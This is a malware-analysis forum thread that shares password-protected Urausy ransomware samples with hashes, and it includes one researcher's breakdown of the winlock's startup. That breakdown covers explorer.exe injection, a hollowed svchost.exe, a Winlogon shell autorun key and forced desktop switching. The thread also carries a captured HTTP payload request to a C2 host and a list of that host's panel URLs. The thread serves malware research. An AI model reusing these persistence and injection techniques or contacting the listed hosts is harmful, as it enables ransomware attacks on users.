Attachments
Password is "infected" without quotes
(171.96 KiB) Downloaded 232 times
(171.96 KiB) Downloaded 232 times
Urausy
MD5: 74203CB3EE8722B8DE95CC2236C06F3E
vt - https://www.virustotal.com/file/59abd45 ... /analysis/
A forum for reverse engineering, OS internals and malware analysis
Attachments
pwd: infected
(128.51 KiB) Downloaded 194 times
(128.51 KiB) Downloaded 194 times
5x Urausy
Attachments
Password is "infected" without quotes
(247.04 KiB) Downloaded 149 times
(247.04 KiB) Downloaded 149 times
Hi,
I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2
Thanks
I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2
Thanks
Win32:Virut wrote:Hi,SHA256: e19c8f1ea80d6cf9d3348a07c7428bbcdfc66ea5a192f63e22a8e29cfda5aaf0
I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2
Thanks
SHA1: fae01f374d5dde3271306aca91f842f9f0b17d75
MD5: 0efd95e4d3502e20b7120685050abae2
File size: 44032 bytes
Attachments
pass:infected
(28.42 KiB) Downloaded 112 times
(28.42 KiB) Downloaded 112 times
Urausy
Click to enlarge
Click to enlarge
Attachments
Password is "infected" without quotes.
(53.18 KiB) Downloaded 149 times
(53.18 KiB) Downloaded 149 times
Hi.
This is interesting ransom. It is written in fasm 1.7 and this make it something special. Usually ransomware are Delphi applications which are written by people with no programming skills. This one is different. It still simple compared to famous trojans, but there are some features which are making it special.
It has three stage startup.
On a first stage it registers window class "SetupFrameClass" creates window called "Setup" and waits few milliseconds. After wnd_procedure (see @004012D0) assumes control, it calls specially prepared code (see @004013A0) responsible for second stage and further trojan installation.
Second stage - memory inject in explorer.exe. After this code activates it is creating new special desktop named wLockDesktop, starting zombified copy of svchost.exe with injected (again) trojan code and initial process desktop value set to be wLockDesktop. Then execution transfers to this zombified svchost.exe
Third stage is responsible for setting autorun registry key
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell with value explorer.exe,%userprofile%\Application Data\msconfig.dat
<--- it is ransom itself (copy file routine also take place in this stage).
Ransom (code running inside svchost.exe) ensures that wLockDesktop is current active desktop by doing periodical switching to it. This was made to defeat sysinternals desktops and similar tools.
Decrypted and working dropper in attach. Password "infected" without quotes.
Best Regards,
-rin
This is interesting ransom. It is written in fasm 1.7 and this make it something special. Usually ransomware are Delphi applications which are written by people with no programming skills. This one is different. It still simple compared to famous trojans, but there are some features which are making it special.
It has three stage startup.
On a first stage it registers window class "SetupFrameClass" creates window called "Setup" and waits few milliseconds. After wnd_procedure (see @004012D0) assumes control, it calls specially prepared code (see @004013A0) responsible for second stage and further trojan installation.
Second stage - memory inject in explorer.exe. After this code activates it is creating new special desktop named wLockDesktop, starting zombified copy of svchost.exe with injected (again) trojan code and initial process desktop value set to be wLockDesktop. Then execution transfers to this zombified svchost.exe
Third stage is responsible for setting autorun registry key
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell with value explorer.exe,%userprofile%\Application Data\msconfig.dat
<--- it is ransom itself (copy file routine also take place in this stage).
Ransom (code running inside svchost.exe) ensures that wLockDesktop is current active desktop by doing periodical switching to it. This was made to defeat sysinternals desktops and similar tools.
Decrypted and working dropper in attach. Password "infected" without quotes.
Best Regards,
-rin
Attachments
(14.67 KiB) Downloaded 117 times
Switching to different desktop set in the infinite loop with a very small delay.
Used embedded IE window to display HTML based content.
Payload requested in encrypted container, special marker appended to the beginning of request string - "55565755".
Code: Select all
Winlock window hierarhy (diffent run, that why different PID).00000039 273.98556519 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000040 274.08596802 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000041 274.18600464 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000042 274.28622437 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000043 274.38613892 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000044 274.48648071 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000045 274.59146118 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000046 274.68685913 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000047 274.78668213 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000048 274.90359497 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000049 275.01293945 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000050 275.10397339 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000051 275.20385742 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000052 275.32345581 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000053 275.43780518 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000054 275.52349854 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000055 275.62338257 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied
00000056 275.72372437 [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied Used embedded IE window to display HTML based content.
Payload requested in encrypted container, special marker appended to the beginning of request string - "55565755".
GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1Decrypts into %temp% folder and then executes by ransom from embedded full screen IE window. Ransom page + all graphics/css in attach.
User-Agent: Our_Agent
Host: hhrbn.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 18 Nov 2012 01:11:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Cache-Control: public
Content-Disposition: attachment; filename=32721
Content-Transfer-Encoding: binary
Content-Length: 83722
Attachments
pass: malware
(68.05 KiB) Downloaded 109 times
(68.05 KiB) Downloaded 109 times
Ring0 - the source of inspiration
EP_X0FF wrote:Host: hhrbn.ruNot at home the weekend so can't attack/dissas stuff but found this
Code: Select all
mysql.php return "could not find driver" rest are standard HTTP 200/Length 0, probably need parameters.rnmbe.su/hhrbn.ru
hxxp://46.37.162.28:80/user/login/ « auth service »
hxxp://hhrbn.ru:80/data.php
hxxp://hhrbn.ru:80/config.php
hxxp://hhrbn.ru:80/gateway.php
hxxp://hhrbn.ru:80/includes/rc4.php
hxxp://hhrbn.ru:80/includes/mysql.php
hxxp://hhrbn.ru:80/includes/functions.php
hxxp://hhrbn.ru:80/config/
hxxp://hhrbn.ru:80/cache/
New Urausy
Attachments
Password is "infected" without quotes.
(53.01 KiB) Downloaded 136 times
(53.01 KiB) Downloaded 136 times